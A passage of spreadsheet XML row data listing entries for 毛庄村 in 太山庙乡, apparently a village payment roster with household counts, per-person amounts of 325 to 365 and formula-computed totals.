        <v>5403</v>
      </c>
      <c r="F2047" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2047" s="24">
        <v>2</v>
      </c>
      <c r="H2047" s="25">
        <v>325</v>
      </c>
      <c r="I2047" s="24">
        <f t="shared" si="31"/>
        <v>650</v>
      </c>
      <c r="J2047" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2047" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2048" customHeight="1" spans="1:11">
      <c r="A2048" s="23" t="s">
        <v>5443</v>
      </c>
      <c r="B2048" s="24" t="str">
        <f>B2047</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2048" s="24" t="str">
        <f>C2047</f>
        <v>毛庄村</v>
      </c>
      <c r="D2048" s="23" t="s">
        <v>5444</v>
      </c>
      <c r="E2048" s="32" t="s">
        <v>5385</v>
      </c>
      <c r="F2048" s="24">
        <f>F2047</f>
        <v>4113210704</v>
      </c>
      <c r="G2048" s="24"/>
      <c r="H2048" s="24"/>
      <c r="I2048" s="24">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="J2048" s="24"/>
      <c r="K2048" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2049" customHeight="1" spans="1:11">
      <c r="A2049" s="23" t="s">
        <v>5445</v>
      </c>
      <c r="B2049" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2049" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2049" s="24" t="s">
        <v>5446</v>
      </c>
      <c r="E2049" s="24" t="s">
        <v>5447</v>
      </c>
      <c r="F2049" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2049" s="24">
        <v>1</v>
      </c>
      <c r="H2049" s="25">
        <v>365</v>
      </c>
      <c r="I2049" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2049" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2049" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2050" customHeight="1" spans="1:11">
      <c r="A2050" s="23" t="s">
        <v>5448</v>
      </c>
      <c r="B2050" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2050" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2050" s="24" t="s">
        <v>5449</v>
      </c>
      <c r="E2050" s="24" t="s">
        <v>5450</v>
      </c>
      <c r="F2050" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2050" s="24">
        <v>2</v>
      </c>
      <c r="H2050" s="25">
        <v>325</v>
      </c>
      <c r="I2050" s="24">
        <f t="shared" si="31"/>
        <v>650</v>
      </c>
      <c r="J2050" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2050" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2051" customHeight="1" spans="1:11">
      <c r="A2051" s="23" t="s">
        <v>5451</v>
      </c>
      <c r="B2051" s="24" t="str">
        <f>B2050</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2051" s="24" t="str">
        <f>C2050</f>
        <v>毛庄村</v>
      </c>
      <c r="D2051" s="23" t="s">
        <v>5452</v>
      </c>
      <c r="E2051" s="23" t="s">
        <v>5453</v>
      </c>
      <c r="F2051" s="24">
        <f>F2050</f>
        <v>4113210704</v>
      </c>
      <c r="G2051" s="24"/>
      <c r="H2051" s="24"/>
      <c r="I2051" s="24">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="J2051" s="24"/>
      <c r="K2051" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2052" customHeight="1" spans="1:11">
      <c r="A2052" s="23" t="s">
        <v>5454</v>
      </c>
      <c r="B2052" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2052" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2052" s="24" t="s">
        <v>5455</v>
      </c>
      <c r="E2052" s="24" t="s">
        <v>5380</v>
      </c>
      <c r="F2052" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2052" s="24">
        <v>1</v>
      </c>
      <c r="H2052" s="25">
        <v>365</v>
      </c>
      <c r="I2052" s="24">
        <f t="shared" ref="I2052:I2115" si="32">H2052*G2052</f>
        <v>365</v>
      </c>
      <c r="J2052" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2052" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2053" customHeight="1" spans="1:11">
      <c r="A2053" s="23" t="s">
        <v>5456</v>
      </c>
      <c r="B2053" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2053" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2053" s="24" t="s">
        <v>5457</v>
      </c>
      <c r="E2053" s="24" t="s">
        <v>5425</v>
      </c>
      <c r="F2053" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2053" s="24">
        <v>1</v>
      </c>
      <c r="H2053" s="25">
        <v>365</v>
      </c>
      <c r="I2053" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2053" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2053" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2054" customHeight="1" spans="1:11">
      <c r="A2054" s="23" t="s">
        <v>5458</v>
      </c>
      <c r="B2054" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2054" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2054" s="24" t="s">
        <v>5459</v>
      </c>
      <c r="E2054" s="24" t="s">
        <v>5460</v>
      </c>
      <c r="F2054" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2054" s="24">
        <v>2</v>
      </c>
      <c r="H2054" s="25">
        <v>325</v>
      </c>
      <c r="I2054" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2054" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2054" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2055" customHeight="1" spans="1:11">
      <c r="A2055" s="23" t="s">
        <v>5461</v>
      </c>
      <c r="B2055" s="24" t="str">
        <f>B2054</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2055" s="24" t="str">
        <f>C2054</f>
        <v>毛庄村</v>
      </c>
      <c r="D2055" s="23" t="s">
        <v>5462</v>
      </c>
      <c r="E2055" s="23" t="s">
        <v>3510</v>
      </c>
      <c r="F2055" s="24">
        <f>F2054</f>
        <v>4113210704</v>
      </c>
      <c r="G2055" s="24"/>
      <c r="H2055" s="24"/>
      <c r="I2055" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2055" s="24"/>
      <c r="K2055" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2056" customHeight="1" spans="1:11">
      <c r="A2056" s="23" t="s">
        <v>5463</v>
      </c>
      <c r="B2056" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2056" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2056" s="24" t="s">
        <v>5464</v>
      </c>
      <c r="E2056" s="24" t="s">
        <v>5390</v>
      </c>
      <c r="F2056" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2056" s="24">
        <v>1</v>
      </c>
      <c r="H2056" s="25">
        <v>365</v>
      </c>
      <c r="I2056" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2056" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2056" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2057" customHeight="1" spans="1:11">
      <c r="A2057" s="23" t="s">
        <v>5465</v>
      </c>
      <c r="B2057" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2057" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2057" s="24" t="s">
        <v>5466</v>
      </c>
      <c r="E2057" s="24" t="s">
        <v>5467</v>
      </c>
      <c r="F2057" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2057" s="24">
        <v>1</v>
      </c>
      <c r="H2057" s="25">
        <v>365</v>
      </c>
      <c r="I2057" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2057" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2057" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2058" customHeight="1" spans="1:11">
      <c r="A2058" s="23" t="s">
        <v>5468</v>
      </c>
      <c r="B2058" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2058" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2058" s="24" t="s">
        <v>5469</v>
      </c>
      <c r="E2058" s="24" t="s">
        <v>5470</v>
      </c>
      <c r="F2058" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2058" s="24">
        <v>2</v>
      </c>
      <c r="H2058" s="25">
        <v>325</v>
      </c>
      <c r="I2058" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2058" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2058" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2059" customHeight="1" spans="1:11">
      <c r="A2059" s="23" t="s">
        <v>5471</v>
      </c>
      <c r="B2059" s="24" t="str">
        <f>B2058</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2059" s="24" t="str">
        <f>C2058</f>
        <v>毛庄村</v>
      </c>
      <c r="D2059" s="23" t="s">
        <v>5472</v>
      </c>
      <c r="E2059" s="23" t="s">
        <v>5473</v>
      </c>
      <c r="F2059" s="24">
        <f>F2058</f>
        <v>4113210704</v>
      </c>
      <c r="G2059" s="24"/>
      <c r="H2059" s="24"/>
      <c r="I2059" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2059" s="24"/>
      <c r="K2059" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2060" customHeight="1" spans="1:11">
      <c r="A2060" s="23" t="s">
        <v>5474</v>
      </c>
      <c r="B2060" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2060" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2060" s="24" t="s">
        <v>5475</v>
      </c>
      <c r="E2060" s="24" t="s">
        <v>5476</v>
      </c>
      <c r="F2060" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2060" s="24">
        <v>1</v>
      </c>
      <c r="H2060" s="25">
        <v>365</v>
      </c>
      <c r="I2060" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2060" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2060" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2061" customHeight="1" spans="1:11">
      <c r="A2061" s="23" t="s">
        <v>5477</v>
      </c>
      <c r="B2061" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2061" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2061" s="24" t="s">
        <v>5478</v>
      </c>
      <c r="E2061" s="24" t="s">
        <v>5479</v>
      </c>
      <c r="F2061" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2061" s="24">
        <v>1</v>
      </c>
      <c r="H2061" s="25">
        <v>365</v>
      </c>
      <c r="I2061" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2061" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2061" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2062" customHeight="1" spans="1:11">
      <c r="A2062" s="23" t="s">
        <v>5480</v>
      </c>
      <c r="B2062" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2062" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2062" s="24" t="s">
        <v>5481</v>
      </c>
      <c r="E2062" s="24" t="s">
        <v>5015</v>
      </c>
      <c r="F2062" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2062" s="24">
        <v>1</v>
      </c>
      <c r="H2062" s="25">
        <v>365</v>
      </c>
      <c r="I2062" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2062" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2062" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2063" customHeight="1" spans="1:11">
      <c r="A2063" s="23" t="s">
        <v>5482</v>
      </c>
      <c r="B2063" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2063" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2063" s="24" t="s">
        <v>5483</v>
      </c>
      <c r="E2063" s="24" t="s">
        <v>5371</v>
      </c>
      <c r="F2063" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2063" s="24">
        <v>2</v>
      </c>
      <c r="H2063" s="25">
        <v>325</v>
      </c>
      <c r="I2063" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2063" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2063" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2064" customHeight="1" spans="1:11">
      <c r="A2064" s="23" t="s">
        <v>5484</v>
      </c>
      <c r="B2064" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2064" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2064" s="24" t="s">
        <v>5485</v>
      </c>
      <c r="E2064" s="24" t="s">
        <v>5486</v>
      </c>
      <c r="F2064" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2064" s="24"/>
      <c r="I2064" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2064" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2064" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2065" customHeight="1" spans="1:11">
      <c r="A2065" s="23" t="s">
        <v>5487</v>
      </c>
      <c r="B2065" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2065" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2065" s="24" t="s">
        <v>5488</v>
      </c>
      <c r="E2065" s="24" t="s">
        <v>5400</v>
      </c>
      <c r="F2065" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2065" s="24">
        <v>1</v>
      </c>
      <c r="H2065" s="25">
        <v>365</v>
      </c>
      <c r="I2065" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2065" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2065" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2066" customHeight="1" spans="1:11">
      <c r="A2066" s="23" t="s">
        <v>5489</v>
      </c>
      <c r="B2066" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2066" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2066" s="24" t="s">
        <v>5490</v>
      </c>
      <c r="E2066" s="24" t="s">
        <v>5479</v>
      </c>
      <c r="F2066" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2066" s="24">
        <v>1</v>
      </c>
      <c r="H2066" s="25">
        <v>365</v>
      </c>
      <c r="I2066" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2066" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2066" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2067" customHeight="1" spans="1:11">
      <c r="A2067" s="23" t="s">
        <v>5491</v>
      </c>
      <c r="B2067" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2067" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2067" s="24" t="s">
        <v>5492</v>
      </c>
      <c r="E2067" s="24" t="s">
        <v>5493</v>
      </c>
      <c r="F2067" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2067" s="24">
        <v>1</v>
      </c>
      <c r="H2067" s="25">
        <v>365</v>
      </c>
      <c r="I2067" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2067" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2067" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2068" customHeight="1" spans="1:11">
      <c r="A2068" s="23" t="s">
        <v>5494</v>
      </c>
      <c r="B2068" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2068" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2068" s="24" t="s">
        <v>5495</v>
      </c>
      <c r="E2068" s="24" t="s">
        <v>5496</v>
      </c>
      <c r="F2068" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2068" s="24">
        <v>2</v>
      </c>
      <c r="H2068" s="25">
        <v>325</v>
      </c>
      <c r="I2068" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2068" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2068" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2069" customHeight="1" spans="1:11">
      <c r="A2069" s="23" t="s">
        <v>5497</v>
      </c>
      <c r="B2069" s="24" t="str">
        <f>B2068</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2069" s="24" t="str">
        <f>C2068</f>
        <v>毛庄村</v>
      </c>
      <c r="D2069" s="23" t="s">
        <v>5498</v>
      </c>
      <c r="E2069" s="23" t="s">
        <v>5499</v>
      </c>
      <c r="F2069" s="24">
        <f>F2068</f>
        <v>4113210704</v>
      </c>
      <c r="G2069" s="24"/>
      <c r="H2069" s="24"/>
      <c r="I2069" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2069" s="24"/>
      <c r="K2069" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2070" customHeight="1" spans="1:11">
      <c r="A2070" s="23" t="s">
        <v>5500</v>
      </c>
      <c r="B2070" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2070" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2070" s="24" t="s">
        <v>5501</v>
      </c>
      <c r="E2070" s="24" t="s">
        <v>5467</v>
      </c>
      <c r="F2070" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2070" s="24">
        <v>1</v>
      </c>
      <c r="H2070" s="25">
        <v>365</v>
      </c>
      <c r="I2070" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2070" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2070" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2071" customHeight="1" spans="1:11">
      <c r="A2071" s="23" t="s">
        <v>5502</v>
      </c>
      <c r="B2071" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2071" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2071" s="24" t="s">
        <v>5503</v>
      </c>
      <c r="E2071" s="24" t="s">
        <v>5504</v>
      </c>
      <c r="F2071" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2071" s="24">
        <v>2</v>
      </c>
      <c r="H2071" s="25">
        <v>325</v>
      </c>
      <c r="I2071" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2071" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2071" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2072" customHeight="1" spans="1:11">
      <c r="A2072" s="23" t="s">
        <v>5505</v>
      </c>
      <c r="B2072" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2072" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2072" s="24" t="s">
        <v>5506</v>
      </c>
      <c r="E2072" s="24" t="s">
        <v>5473</v>
      </c>
      <c r="F2072" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2072" s="24"/>
      <c r="I2072" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2072" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2072" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2073" customHeight="1" spans="1:11">
      <c r="A2073" s="23" t="s">
        <v>5507</v>
      </c>
      <c r="B2073" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2073" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2073" s="24" t="s">
        <v>5508</v>
      </c>
      <c r="E2073" s="24" t="s">
        <v>5509</v>
      </c>
      <c r="F2073" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2073" s="24">
        <v>1</v>
      </c>
      <c r="H2073" s="25">
        <v>365</v>
      </c>
      <c r="I2073" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2073" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2073" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2074" customHeight="1" spans="1:11">
      <c r="A2074" s="23" t="s">
        <v>5510</v>
      </c>
      <c r="B2074" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2074" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2074" s="24" t="s">
        <v>5511</v>
      </c>
      <c r="E2074" s="24" t="s">
        <v>2797</v>
      </c>
      <c r="F2074" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2074" s="24">
        <v>2</v>
      </c>
      <c r="H2074" s="25">
        <v>345</v>
      </c>
      <c r="I2074" s="24">
        <f t="shared" si="32"/>
        <v>690</v>
      </c>
      <c r="J2074" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2074" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2075" customHeight="1" spans="1:11">
      <c r="A2075" s="23" t="s">
        <v>5512</v>
      </c>
      <c r="B2075" s="24" t="str">
        <f>B2074</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2075" s="24" t="str">
        <f>C2074</f>
        <v>毛庄村</v>
      </c>
      <c r="D2075" s="23" t="s">
        <v>5513</v>
      </c>
      <c r="E2075" s="23" t="s">
        <v>5514</v>
      </c>
      <c r="F2075" s="24">
        <f>F2074</f>
        <v>4113210704</v>
      </c>
      <c r="G2075" s="24"/>
      <c r="H2075" s="24"/>
      <c r="I2075" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2075" s="24"/>
      <c r="K2075" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2076" customHeight="1" spans="1:11">
      <c r="A2076" s="23" t="s">
        <v>5515</v>
      </c>
      <c r="B2076" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2076" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2076" s="24" t="s">
        <v>5516</v>
      </c>
      <c r="E2076" s="24" t="s">
        <v>5517</v>
      </c>
      <c r="F2076" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2076" s="24">
        <v>2</v>
      </c>
      <c r="H2076" s="25">
        <v>325</v>
      </c>
      <c r="I2076" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2076" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2076" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2077" customHeight="1" spans="1:11">
      <c r="A2077" s="23" t="s">
        <v>5518</v>
      </c>
      <c r="B2077" s="24" t="str">
        <f>B2076</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2077" s="24" t="str">
        <f>C2076</f>
        <v>毛庄村</v>
      </c>
      <c r="D2077" s="23" t="s">
        <v>5519</v>
      </c>
      <c r="E2077" s="23" t="s">
        <v>5520</v>
      </c>
      <c r="F2077" s="24">
        <f>F2076</f>
        <v>4113210704</v>
      </c>
      <c r="G2077" s="24"/>
      <c r="H2077" s="24"/>
      <c r="I2077" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2077" s="24"/>
      <c r="K2077" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2078" customHeight="1" spans="1:11">
      <c r="A2078" s="23" t="s">
        <v>5521</v>
      </c>
      <c r="B2078" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2078" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2078" s="24" t="s">
        <v>5522</v>
      </c>
      <c r="E2078" s="24" t="s">
        <v>5523</v>
      </c>
      <c r="F2078" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2078" s="24">
        <v>1</v>
      </c>
      <c r="H2078" s="25">
        <v>365</v>
      </c>
      <c r="I2078" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2078" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2078" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2079" customHeight="1" spans="1:11">
      <c r="A2079" s="23" t="s">
        <v>5524</v>
      </c>
      <c r="B2079" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2079" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2079" s="24" t="s">
        <v>5525</v>
      </c>
      <c r="E2079" s="24" t="s">
        <v>5419</v>
      </c>
      <c r="F2079" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2079" s="24">
        <v>1</v>
      </c>
      <c r="H2079" s="25">
        <v>365</v>
      </c>
      <c r="I2079" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2079" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2079" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2080" customHeight="1" spans="1:11">
      <c r="A2080" s="23" t="s">
        <v>5526</v>
      </c>
      <c r="B2080" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2080" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2080" s="24" t="s">
        <v>5527</v>
      </c>
      <c r="E2080" s="24" t="s">
        <v>5528</v>
      </c>
      <c r="F2080" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2080" s="24">
        <v>1</v>
      </c>
      <c r="H2080" s="25">
        <v>365</v>
      </c>
      <c r="I2080" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2080" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2080" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2081" customHeight="1" spans="1:11">
      <c r="A2081" s="23" t="s">
        <v>5529</v>
      </c>
      <c r="B2081" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2081" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2081" s="24" t="s">
        <v>5530</v>
      </c>
      <c r="E2081" s="24" t="s">
        <v>5414</v>
      </c>
      <c r="F2081" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2081" s="24">
        <v>2</v>
      </c>
      <c r="H2081" s="25">
        <v>325</v>
      </c>
      <c r="I2081" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2081" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2081" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2082" customHeight="1" spans="1:11">
      <c r="A2082" s="23" t="s">
        <v>5531</v>
      </c>
      <c r="B2082" s="24" t="str">
        <f>B2081</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2082" s="24" t="str">
        <f>C2081</f>
        <v>毛庄村</v>
      </c>
      <c r="D2082" s="23" t="s">
        <v>5532</v>
      </c>
      <c r="E2082" s="32" t="s">
        <v>5473</v>
      </c>
      <c r="F2082" s="24">
        <f>F2081</f>
        <v>4113210704</v>
      </c>
      <c r="G2082" s="24"/>
      <c r="H2082" s="24"/>
      <c r="I2082" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2082" s="24"/>
      <c r="K2082" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2083" customHeight="1" spans="1:11">
      <c r="A2083" s="23" t="s">
        <v>5533</v>
      </c>
      <c r="B2083" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2083" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2083" s="24" t="s">
        <v>5534</v>
      </c>
      <c r="E2083" s="24" t="s">
        <v>5535</v>
      </c>
      <c r="F2083" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2083" s="24">
        <v>2</v>
      </c>
      <c r="H2083" s="25">
        <v>325</v>
      </c>
      <c r="I2083" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2083" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2083" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2084" customHeight="1" spans="1:11">
      <c r="A2084" s="23" t="s">
        <v>5536</v>
      </c>
      <c r="B2084" s="24" t="str">
        <f>B2083</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2084" s="24" t="str">
        <f>C2083</f>
        <v>毛庄村</v>
      </c>
      <c r="D2084" s="23" t="s">
        <v>5537</v>
      </c>
      <c r="E2084" s="23" t="s">
        <v>5479</v>
      </c>
      <c r="F2084" s="24">
        <f>F2083</f>
        <v>4113210704</v>
      </c>
      <c r="G2084" s="24"/>
      <c r="H2084" s="24"/>
      <c r="I2084" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2084" s="24"/>
      <c r="K2084" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2085" customHeight="1" spans="1:11">
      <c r="A2085" s="23" t="s">
        <v>5538</v>
      </c>
      <c r="B2085" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2085" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2085" s="24" t="s">
        <v>5539</v>
      </c>
      <c r="E2085" s="24" t="s">
        <v>5504</v>
      </c>
      <c r="F2085" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2085" s="24">
        <v>2</v>
      </c>
      <c r="H2085" s="25">
        <v>325</v>
      </c>
      <c r="I2085" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2085" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2085" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2086" customHeight="1" spans="1:11">
      <c r="A2086" s="23" t="s">
        <v>5540</v>
      </c>
      <c r="B2086" s="24" t="str">
        <f>B2085</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2086" s="24" t="str">
        <f>C2085</f>
